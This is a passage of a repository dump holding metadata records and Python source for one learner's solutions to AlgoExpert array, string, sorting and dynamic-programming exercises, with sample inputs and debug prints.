"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 31,
"path": "/ArraysCategory/SmallestDifference/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nlog(n) + mlog(m)) space | O(1) time\ndef smallestDifference(arrayOne, arrayTwo):\n\tarrayOne.sort()\n\tarrayTwo.sort()\n\n\tleft_one = 0\n\tleft_two = 0\n\t\t\n\tnum_one = 99\n\tnum_two = 99\n\tdiff = float('inf')\n\t\t\n\twhile left_one < len(arrayOne) and left_two < len(arrayTwo):\n\t\tif arrayOne[left_one] == arrayTwo[left_two]:\n\t\t\tnum_one = arrayOne[left_one]\n\t\t\tnum_two = arrayTwo[left_two]\n\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tbreak\n\t\telif arrayOne[left_one] < arrayTwo[left_two]:\n\t\t\tif abs(arrayOne[left_one] - arrayTwo[left_two]) < diff:\n\t\t\t\tnum_one = arrayOne[left_one]\n\t\t\t\tnum_two = arrayTwo[left_two]\n\t\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tleft_one += 1\n\t\telse:\n\t\t\tif abs(arrayOne[left_one] - arrayTwo[left_two]) < diff:\n\t\t\t\tnum_one = arrayOne[left_one]\n\t\t\t\tnum_two = arrayTwo[left_two]\n\t\t\t\tdiff = abs(arrayOne[left_one] - arrayTwo[left_two])\n\t\t\tleft_two += 1\n\treturn [num_one, num_two]\n"
},
{
"alpha_fraction": 0.4771897792816162,
"alphanum_fraction": 0.5082116723060608,
"avg_line_length": 34.3870964050293,
"blob_id": "8205fe450f6b5aa1e92129b11e46976046d30336",
"content_id": "a3185cda7d3f7e58aae0d4fac5ff6ba68fb5623e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 31,
"path": "/ArraysCategory/FourNumberSum/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n^2) space\ndef fourNumberSum(array, targetSum):\n two_number_all_possible_sums = {}\n for i in range(len(array)):\n for j in range(len(array)):\n if i != j:\n if (i, j) not in two_number_all_possible_sums and (j, i) not in two_number_all_possible_sums:\n two_number_all_possible_sums[(i, j)] = [array[i], array[j]]\n \n\n results = []\n for item1, value1 in two_number_all_possible_sums.items():\n for item2, value2 in two_number_all_possible_sums.items():\n if item1 != item2:\n if value1[0] not in value2 and value1[1] not in value2:\n if sum(value1) + sum(value2) == targetSum:\n if sum(value1) + sum(value2) not in results:\n arr = [value1[0], value1[1], value2[0], value2[1]]\n arr.sort()\n if arr not in results:\n results.append(arr)\n\n return results\n \n\n\n\narr = [7, 6, 4, -1, 1, 2]\ntargSum = 16\n\nprint(fourNumberSum(arr, targSum))"
},
{
"alpha_fraction": 0.6094316840171814,
"alphanum_fraction": 0.61426842212677,
"avg_line_length": 25.677419662475586,
"blob_id": "876fc71a5b5e7152256f776cdf35b9b490e9e423",
"content_id": "a318327f51a9e68de590b57b0f69d78e61f42f84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/ArraysCategory/MonotonicArray/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def isMonotonic(array):\n if len(array) == 0: return True\n\t\n increasing_sum = array[0]\n decreasing_sum = array[0]\n\t\n increasing_type = False\n decreasing_type = False\n\t\n for index in range(1, len(array)):\n\t if not increasing_type and not decreasing_type:\n\t\t if array[index] == increasing_sum == decreasing_sum:\n\t\t\t continue\n\t\t elif array[index] > increasing_sum:\n\t\t\t increasing_type = True\n\t\t\t increasing_sum = array[index]\n\t\t else:\n\t\t\t decreasing_type = True\n\t\t\t decreasing_sum = array[index]\n\t\t\t\n\t if increasing_type:\n\t\t if array[index] < increasing_sum:\n\t\t\t return False\n\t\t else:\n\t\t\t increasing_sum = array[index]\n\t elif decreasing_type:\n\t\t if array[index] > decreasing_sum:\n\t\t\t return False\n\t\t else:\n\t\t\t decreasing_sum = array[index]\n return True\n"
},
{
"alpha_fraction": 0.5967540740966797,
"alphanum_fraction": 0.6192259788513184,
"avg_line_length": 32.41666793823242,
"blob_id": "a3129ec7ed720a0ff5467e9fcbca5c9dcd046b61",
"content_id": "6d042ee1f083baa5f45af14f630652edad5bcb5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/Strings/LongestPalindromicSubstring/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef longestPalindromicSubstring(string):\n longest_palindrome = [0, 1]\n for i in range(1, len(string)):\n odd = expand_from_index(string, i - 1, i + 1)\n even = expand_from_index(string, i - 1, i)\n tmp_longest = max(odd, even, key=lambda x : x[1] - x[0])\n longest_palindrome = max(longest_palindrome, tmp_longest, key=lambda x : x[1] - x[0])\n return string[longest_palindrome[0]: longest_palindrome[1]]\n\ndef expand_from_index(string, left, right):\n leftid = left\n rightid = right\n\n while leftid >= 0 and rightid < len(string):\n if string[leftid] != string[rightid]:\n break\n leftid -= 1\n rightid += 1\n\n return [leftid + 1, rightid]\n\nstring = 'abaxyzzyxf'\nprint(longestPalindromicSubstring(string))"
},
{
"alpha_fraction": 0.5040000081062317,
"alphanum_fraction": 0.5199999809265137,
"avg_line_length": 31.65217399597168,
"blob_id": "fbe55cf621fd25719dab973899a0f37af617cbd2",
"content_id": "bc77e7a008ce94ee3ad1233893e5e53cf14e443f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 750,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/DynamicProgramming/PalindromePartitioningMinCuts/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(n) space\ndef palindromePartitioningMinCuts(string):\n cuts = [float('inf') for i in range(len(string))]\n palindromes = [False for i in range(len(string))]\n cuts[0] = 1 \n\n for i in range(1, len(string)):\n for j in range(0, i):\n if isPalindrome(string[j: i + 1]):\n palindromes[i] = True\n if palindromes[j]:\n cuts[i] = min(cuts[i], cuts[j] + 1)\n else:\n cuts[i] = min(cuts[i], cuts[j])\n else:\n cuts[i] = min(cuts[i], cuts[i - 1] + 1)\n return (cuts[-1] - 1)\n\ndef isPalindrome(string):\n return string == string[::-1]\n\nstring = \"ababbbabbababa\"\nprint(palindromePartitioningMinCuts(string))"
},
{
"alpha_fraction": 0.4259471893310547,
"alphanum_fraction": 0.46268656849861145,
"avg_line_length": 30.14285659790039,
"blob_id": "cd57f21ad8c7bbde5150b869c5bae2d711d224fe",
"content_id": "7c57543d3fc9dfe8e11ea05108aed38a0c57f08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 28,
"path": "/ArraysCategory/LongestPeak/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef longestPeak(array):\n longest_peak_length = 0\n for i in range(1, len(array) - 1):\n isPeak = array[i - 1] < array[i] and array[i] > array[i + 1]\n \n if not isPeak:\n continue\n print(array[i - 1], array[i], array[i + 1])\n curr_peak_length = 3\n \n for j in range(i - 2, -1, -1):\n if array[j + 1] > array[j]:\n curr_peak_length += 1\n else: break\n \n for j in range(i + 1, len(array) - 1):\n if array[j] > array[j + 1]:\n curr_peak_length += 1\n else: break\n \n if curr_peak_length > longest_peak_length:\n longest_peak_length = curr_peak_length\n \n return longest_peak_length\n\narr = [1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3]\nprint(longestPeak(arr))"
},
{
"alpha_fraction": 0.44359949231147766,
"alphanum_fraction": 0.46768060326576233,
"avg_line_length": 28.259260177612305,
"blob_id": "0810f26efac2a6ee3cf30a2b33d09021606fc0e3",
"content_id": "9d738eb3f181cad82529c8f52265c2567fb0e2d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/Strings/ValidIPAddresses/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(1) time | O(1) space\ndef validIPAddresses(string):\n Ips = []\n for i in range(1, min(len(string), 4)):\n parts = ['', '', '', '']\n parts[0] = string[:i]\n if not isValid(parts[0]):\n continue\n\t\t\n for j in range(i + 1, i + min(len(string) - i, 4)):\n parts[1] = string[i : j]\n if not isValid(parts[1]):\n continue\n\t\t\t\t\n for k in range(j + 1, j + min(len(string) - j, 4)):\n parts[2] = string[j: k]\n parts[3] = string[k:]\n\t\t\t\t\n if isValid(parts[2]) and isValid(parts[3]):\n Ips.append('.'.join(parts))\n return Ips\n\t\ndef isValid(string: str) -> bool:\n\tnum = int(string)\n\tif num > 255:\n\t\treturn False\n\treturn len(string) == len(str(num))"
},
{
"alpha_fraction": 0.5775076150894165,
"alphanum_fraction": 0.5927051901817322,
"avg_line_length": 24.384614944458008,
"blob_id": "b12b0a6c30119d7755f0cba10544d254001d8b7b",
"content_id": "d2fb003691c07f7faf48d791fb7a7d313285e07d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 329,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 13,
"path": "/ArraysCategory/ValidateSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef isValidSubsequence(array, sequence):\n curr_index = -1\n for elem in sequence:\n\t if elem not in array:\n\t\t return False\n\t else:\n\t\t if array.index(elem) <= curr_index:\n\t\t\t return False\n\t\t else:\n\t\t\t curr_index = array.index(elem)\n\t\t\t array[curr_index] = -99\n return True"
},
{
"alpha_fraction": 0.4984227120876312,
"alphanum_fraction": 0.539432168006897,
"avg_line_length": 32.421051025390625,
"blob_id": "97e3422fc01097547e716d2740f56e8819470746",
"content_id": "f92e603e103ea1bad364c4d0ad04f07b165d4eaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 19,
"path": "/DynamicProgramming/LongestCommonSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def longestCommonSubsequence(str1, str2):\n current_row = ['' for i in range(len(str2) + 1)]\n last_row = ['' for i in range(len(str2) + 1)]\n\n for i in range(1, len(str1) + 1):\n for j in range(1, len(str2) + 1):\n if str1[i - 1] == str2[j - 1]:\n current_row[j] = last_row[j - 1] + str1[i - 1]\n else:\n current_row[j] = max(current_row[j - 1], last_row[j], key=len)\n last_row = current_row[0:]\n result = []\n for elem in last_row[-1]:\n result.append(elem)\n return result\nstr1 = \"XKYKZPW\"\nstr2 = \"ZXVVYZW\"\n\nprint(longestCommonSubsequence(str1, str2))"
},
{
"alpha_fraction": 0.5241379141807556,
"alphanum_fraction": 0.5329153537750244,
"avg_line_length": 31.571428298950195,
"blob_id": "a127ace2356ea2d487711267366ba1af2589f6ab",
"content_id": "3a22500bf775b50538cb1779cc19ff369156725a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1595,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 49,
"path": "/ArraysCategory/ApartmentHunting/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(b^2a) time | O(ba) space where b = number of block and a = number of attributes\nimport copy\ndef apartmentHunting(blocks, reqs):\n building_distances_for_blocks = []\n for block in blocks:\n building_distances_for_blocks.append(copy.deepcopy(block))\n\n for index, b in enumerate(building_distances_for_blocks, 0):\n for key, _ in b.items():\n if not blocks[index][key]:\n b[key] = float('inf')\n else:\n b[key] = 0\n\n\n\n for index1, block in enumerate(building_distances_for_blocks, 0):\n for key, _ in block.items():\n for index2, b in enumerate(blocks, 0):\n if block[key] != 0:\n if b[key]:\n if abs(index2 - index1) < block[key]:\n block[key] = abs(index2 - index1)\n \n distance = float('inf')\n result_index = -1\n for index, b in enumerate(building_distances_for_blocks, 0):\n block_max = float('-inf')\n for key, _ in b.items():\n if key in reqs:\n block_max = max(b[key], block_max)\n if block_max < distance:\n distance = block_max\n result_index = index\n \n return result_index\n \nblocks = [\n {\"gym\": False, \"school\": True, \"store\": False},\n {\"gym\": True, \"school\": False, \"store\": False},\n {\"gym\": True, \"school\": True, \"store\": False},\n {\"gym\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"school\": True, \"store\": True}\n ]\n\nreqs = [\"gym\", \"school\", \"store\"]\n\n\nprint(apartmentHunting(blocks, reqs))"
},
{
"alpha_fraction": 0.46427175402641296,
"alphanum_fraction": 0.47130027413368225,
"avg_line_length": 35.08450698852539,
"blob_id": "779312869d2fca46bcc97bec46a472b12be16aa6",
"content_id": "2e909a37c109a3f3cffa533b0c85931904192049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2561,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 71,
"path": "/Strings/UnderscorifySubstrings/my_Solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def underscorifySubstring(string, substring):\n first_letter_of_substr = substring[0]\n second_letter_of_substr = substring[1]\n first_index = -1\n last_index = -1\n running = False\n found = False\n\n substr_index = 0\n result = []\n\n for i in range(len(string)):\n if not running:\n if found:\n if string[i] == first_letter_of_substr:\n #print('i')\n substr_index = 1\n running = True\n elif string[i] == second_letter_of_substr:\n substr_index = 2\n running = True\n else:\n found = False\n #print('fewfwefwef')\n #print(first_index, last_index, i)\n result.append((first_index, last_index))\n #print(string[i])\n else:\n if string[i] == first_letter_of_substr:\n running = True\n first_index = i\n substr_index = 1\n #else:\n #if found:\n #found = False\n #print('fewfwefwef')\n #print(first_index, last_index, i)\n #result.append((first_index, last_index))\n #string = string[0: first_index] + '_' + string[first_index: last_index] + '_' + string[last_index:]\n else:\n if substr_index == len(substring) - 1 and string[i] == substring[substr_index]:\n #print(string[i], substring[substr_index], substr_index,end='\\n')\n #print('megvan')\n last_index = i\n found = True\n running = False\n if i == len(string) - 1:\n result.append((first_index, last_index))\n #i -= 1\n elif string[i] == substring[substr_index]:\n #print(string[i], substring[substr_index], substr_index)\n substr_index += 1\n else:\n running = False\n if found:\n result.append((first_index, last_index))\n found = False\n\n offset = 0\n print(result)\n for elem in result:\n first, second = elem\n string = string[0: first + offset] + '_' + string[first + offset: second + 1 + offset] + '_' + string[second + 1 + offset:]\n offset += 2\n return string\n \n\nstring = \"abcabcabcabcabcabcabcabcabcabcabcabcabcabc\"\nsubstr = \"abc\"\n\nprint(underscorifySubstring(string, substr))"
},
{
"alpha_fraction": 0.536796510219574,
"alphanum_fraction": 0.5440115332603455,
"avg_line_length": 25.615385055541992,
"blob_id": "1d80adf3e457b0e618289f5987004b1bffb7e57f",
"content_id": "e8307f80c32e03e6533592ef9ee51a277e87ceda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 693,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 26,
"path": "/Strings/LongestSubstringWithoutDuplication/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "\ndef longestSubstringWithoutDuplication(string):\n cache = {}\n longest_substr = []\n\n tmp_substr = []\n\n i = 0\n while i < len(string):\n letter = string[i]\n if letter not in cache:\n cache[letter] = i\n tmp_substr.append(letter)\n i += 1\n else:\n if len(tmp_substr) > len(longest_substr):\n longest_substr = tmp_substr[0:]\n tmp_substr = []\n i = cache[letter] + 1\n cache = {} \n if len(tmp_substr) > len(longest_substr):\n longest_substr = tmp_substr[0:]\n return ''.join(longest_substr)\n\nstring = \"clementisacap\"\n\nprint(longestSubstringWithoutDuplication(string))\n"
},
{
"alpha_fraction": 0.4655396640300751,
"alphanum_fraction": 0.522756814956665,
"avg_line_length": 31.08333396911621,
"blob_id": "b1db8f2ffc9f315627522b2004e4a589efcec98a",
"content_id": "6cac5caa8ac9ce4b30a396b0f21a6eeee8f8f16d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 24,
"path": "/DynamicProgramming/WaterArea/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef waterArea(heights):\n result_1 = [0 for i in range(len(heights))]\n if len(heights) <= 2: return 0\n for i in range(1, len(heights)):\n if heights[i] > result_1[i - 1]:\n result_1[i] = result_1[i - 1]\n else: result_1[i] = max(heights[i - 1], result_1[i - 1])\n \n result_2 = result_1[0:]\n result_2[-1] = heights[-1]\n for i in reversed(range(len(heights) - 1)):\n result_2[i] = max(heights[i + 1], result_2[i + 1])\n\n result = [min(i, j) for i, j in zip(result_1, result_2)]\n res = [i - j for i, j in zip(result, heights)]\n summ = 0\n for elem in res:\n if elem > 0:\n summ += elem\n return summ\n\narr = [0, 8, 0, 0, 5, 0, 0, 10, 0, 0, 1, 1, 0, 3]\nprint(waterArea(arr))"
},
{
"alpha_fraction": 0.5464926362037659,
"alphanum_fraction": 0.5513865947723389,
"avg_line_length": 37.375,
"blob_id": "0a4b377e535fa0ae68d912bd08fdb2ff1b3cbc59",
"content_id": "ee6acd76ff136e2d46f6c4a05dfdc86f1fe359b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 613,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 16,
"path": "/DynamicProgramming/MaxSumIncreasingSubsequence/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef maxSumIncreasingSubsequence(array):\n sums = [array[i] for i in range(len(array))]\n sequences = [None for i in range(len(array))]\n if max(array) <= 0: return [max(array), [max(array)]]\n for i in range(len(array)):\n for j in range(0, i):\n if array[j] < array[i] and sums[j] + array[i] >= sums[i]:\n sums[i] = array[i] + sums[j]\n sequences[i] = j\n result = []\n id = sums.index(max(sums))\n while id is not None:\n result.append(array[id])\n id = sequences[id]\n return [max(sums), list(reversed(result))]"
},
{
"alpha_fraction": 0.5189620852470398,
"alphanum_fraction": 0.5309381484985352,
"avg_line_length": 28.52941131591797,
"blob_id": "ff282577c2e330ced91a9ede717342ffa4465a1a",
"content_id": "e4788073fcefa165f98b7c16d2a064e672cb3a11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 17,
"path": "/Sorting/SelectionSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n)-best O(n)-avarage time | O(1) space\nimport math\ndef selectionSort(array: list) -> list:\n sortedTill = 0\n for i in range(0, len(array) - 1):\n min = math.inf\n index = -1\n for j in range(sortedTill, len(array)):\n if array[j] < min:\n min = array[j]\n index = j\n swap(sortedTill, index, array)\n sortedTill += 1\n return array\n\ndef swap(i: int, j: int, array: list) -> None:\n array[i], array[j] = array[j], array[i]"
},
{
"alpha_fraction": 0.5965166687965393,
"alphanum_fraction": 0.6095790863037109,
"avg_line_length": 30.363636016845703,
"blob_id": "7ab0e39e9124e6d549f0cacdc8ca1f0da98f9933",
"content_id": "0be20561bc7f0ee4c624446bf13ebab7d29e0755",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 689,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/Strings/LongestPalindromicSubstring/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(1) space\ndef longestPalindromicSubstring(string):\n longest_palindrome = ''\n for i in range(len(string)):\n for j in range(i, len(string)):\n substring = string[i: j + 1]\n if len(substring) > len(longest_palindrome) and isPalindrome(substring):\n longest_palindrome = substring[0:]\n return longest_palindrome\n\ndef isPalindrome(string):\n if len(string) == 1: return True\n left = 0\n right = len(string) - 1\n while left < right:\n if string[left] != string[right]:\n return False\n left += 1\n right -= 1\n return True\nstring = 'abaxyzzyxf'\nprint(longestPalindromicSubstring(string))"
},
{
"alpha_fraction": 0.616216242313385,
"alphanum_fraction": 0.6405405402183533,
"avg_line_length": 25.5,
"blob_id": "e4502adad02be7b80492e7c23e9651a7a6d2f1f4",
"content_id": "db4076336c31c1f27008649561d0c72057f94044",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 370,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 14,
"path": "/ArraysCategory/MoveElementToEnd/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef swap(list, pos1, pos2):\n\tlist[pos1], list[pos2] = list[pos2], list[pos1]\n\treturn list\n\ndef moveElementToEnd(array, toMove):\n\t\n number_of_swaps = 0\n for index in range(len(array)):\n\t if array[index] != toMove and index > number_of_swaps:\n\t\t array = swap(array, number_of_swaps, index)\n\t\t number_of_swaps += 1\n\t\n return array"
},
{
"alpha_fraction": 0.5579975843429565,
"alphanum_fraction": 0.5616605877876282,
"avg_line_length": 27.275861740112305,
"blob_id": "606ab90ffa7ff89dde1befb5fb11e05949c60e35",
"content_id": "81eef28ebc8e2259ebe733fe98511a81c2c17715",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 819,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 29,
"path": "/Strings/GroupAnagrams/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(w*n*log(n)) | O(w*n) where w = number of words and n is the longest string`s length\ndef groupAnagrams(words):\n cache = {}\n result = [[] for i in range(len(words))]\n\n index = -1\n for i in range(len(words)):\n curr_word = words[i]\n letter_list = [letter for letter in curr_word]\n letter_list.sort()\n letter_list = tuple(letter_list)\n\n if letter_list not in cache:\n index += 1\n cache[letter_list] = index\n result[index].append(curr_word)\n else:\n\n result[cache[letter_list]].append(curr_word)\n\n final_result = []\n for elem in result:\n if len(elem) > 0:\n final_result.append(elem)\n return final_result\n\nwords = [\"yo\", \"act\", \"flop\", \"tac\", \"foo\", \"cat\", \"oy\", \"olfp\"]\n\nprint(groupAnagrams(words))"
},
{
"alpha_fraction": 0.58203125,
"alphanum_fraction": 0.59375,
"avg_line_length": 22.363636016845703,
"blob_id": "4fe2a1cb8e2428242f1e9ba75fdc567893ced7bf",
"content_id": "8442e02de15008b450de388f240a9ad308549746",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/ArraysCategory/ValidateSubsequence/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef isValidSubsequence(array, sequence):\n seq_index = 0\n\t\n for elem in array:\n\t if seq_index == len(sequence):\n\t\t break\n\t if elem == sequence[seq_index]:\n\t\t seq_index += 1\n\t\t\t\n return seq_index == len(sequence)"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 36.5,
"blob_id": "60a908f57f8fcba2b4fd61178b484dfffe5670d5",
"content_id": "8ef5f2d8f5ff8fe81e2bdb8876073721f53edf05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# AlgoExpertExercises\nSolving every problem given by AlgoExpert in Python.\n"
},
{
"alpha_fraction": 0.3035928010940552,
"alphanum_fraction": 0.37245509028434753,
"avg_line_length": 25.95161247253418,
"blob_id": "62458a8e3381f5b20e953d97dc710696ee030b65",
"content_id": "168d78a04e716ac78c0f1062ff551f6925e38a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 62,
"path": "/ArraysCategory/ZigzagTraverse/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef zigzagTraverse(array):\n i, j = 0, 0\n number_of_elements_in_the_array = len(array) * len(array[0])\n result = []\n if number_of_elements_in_the_array != 0:\n result.append(array[i][j])\n added_elements = 1\n down = False\n up = True\n if len(array) > 1:\n i += 1\n else: j += 1\n while added_elements < number_of_elements_in_the_array:\n if up:\n if i == 0 or j == len(array[0]) - 1:\n result.append(array[i][j])\n added_elements += 1\n up = False\n down = True\n if j + 1 < len(array[0]):\n j += 1\n else: i += 1\n else:\n result.append(array[i][j])\n added_elements += 1\n i -= 1\n j += 1\n elif down:\n if j == 0 or i == len(array) - 1:\n result.append(array[i][j])\n added_elements += 1\n up = True\n down = False\n if i + 1 < len(array):\n i += 1\n else:\n j += 1\n else:\n result.append(array[i][j])\n added_elements += 1\n i += 1\n j -= 1\n return result\n\n'''arr = [ [1, 3, 4, 10, 3, 3], \n [2, 5, 9, 11, 4, 4],\n [6, 8, 12, 15, 4, 4], \n [7, 13, 14, 16, 4, 4]]'''\n\n'''arr = [\n [1, 3, 4, 10, 11],\n [2, 5, 9, 12, 20],\n [6, 8, 13, 19, 21],\n [7, 14, 18, 22, 27],\n [15, 17, 23, 26, 28],\n [16, 24, 25, 29, 30]\n ]'''\n\narr = [[1, 2, 3, 4, 5]]\n\nprint(zigzagTraverse(arr))"
},
{
"alpha_fraction": 0.5233050584793091,
"alphanum_fraction": 0.5338982939720154,
"avg_line_length": 22.649999618530273,
"blob_id": "f0af85914173422fadd1d1cebdab5c9f16d229ed",
"content_id": "49e3f97a17032f8823031d96603611bf5c28449a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 20,
"path": "/ArraysCategory/ArrayOfProducts/solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef arrayOfProducts(array):\n left = [1 for _ in range(len(array))]\n right = [1 for _ in range(len(array))]\n result = [1 for _ in range(len(array))]\n \n prod = 1\n for i in range(len(array)):\n \tleft[i] = prod\n \tprod *= array[i]\n \n prod = 1\n for i in reversed(range(len(array))):\n \tright[i] = prod\n \tprod *= array[i]\n \n for i in range(len(array)):\n \tresult[i] = left[i] * right[i]\n \n return result"
},
{
"alpha_fraction": 0.4987500011920929,
"alphanum_fraction": 0.5400000214576721,
"avg_line_length": 31.040000915527344,
"blob_id": "7434777adcd15765e47a736e2378c92217a18959",
"content_id": "77c2ed60757cdaa6b25475b006c07df9880d9b68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 25,
"path": "/DynamicProgramming/SquareOfZeros/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^4) time | O(1) space\ndef squareOfZeroes(matrix):\n for i in range(len(matrix)):\n for j in range(len(matrix)):\n for k in range(1, len(matrix)):\n if isSquare(i, i + k, j, j + k, matrix) and hasBordersZero(i, i + k, j, j + k, matrix):\n return True\n return False\n\ndef isSquare(r1, r2, c1, c2, matrix):\n return r1 < len(matrix) and r2 < len(matrix) and c1 < len(matrix) and c2 < len(matrix)\n\ndef hasBordersZero(r1, r2, c1, c2, matrix):\n for i in range(r1, r2 + 1):\n if matrix[i][c1] != 0 or matrix[i][c2] != 0:\n return False\n for i in range(c1, c2 + 1):\n if matrix[r1][i] != 0 or matrix[r2][i] != 0:\n return False\n return True\n\nmatrix = [[0, 0],\n [0, 0]]\n\nprint(squareOfZeroes(matrix))"
},
{
"alpha_fraction": 0.49299317598342896,
"alphanum_fraction": 0.5048508644104004,
"avg_line_length": 39.33333206176758,
"blob_id": "dec16aeb2df4384c9034d2409e144987a139515d",
"content_id": "76ef626de5fc40269a0cdb4785b1acd98c3a6b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2783,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 69,
"path": "/ArraysCategory/LongestPeak/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
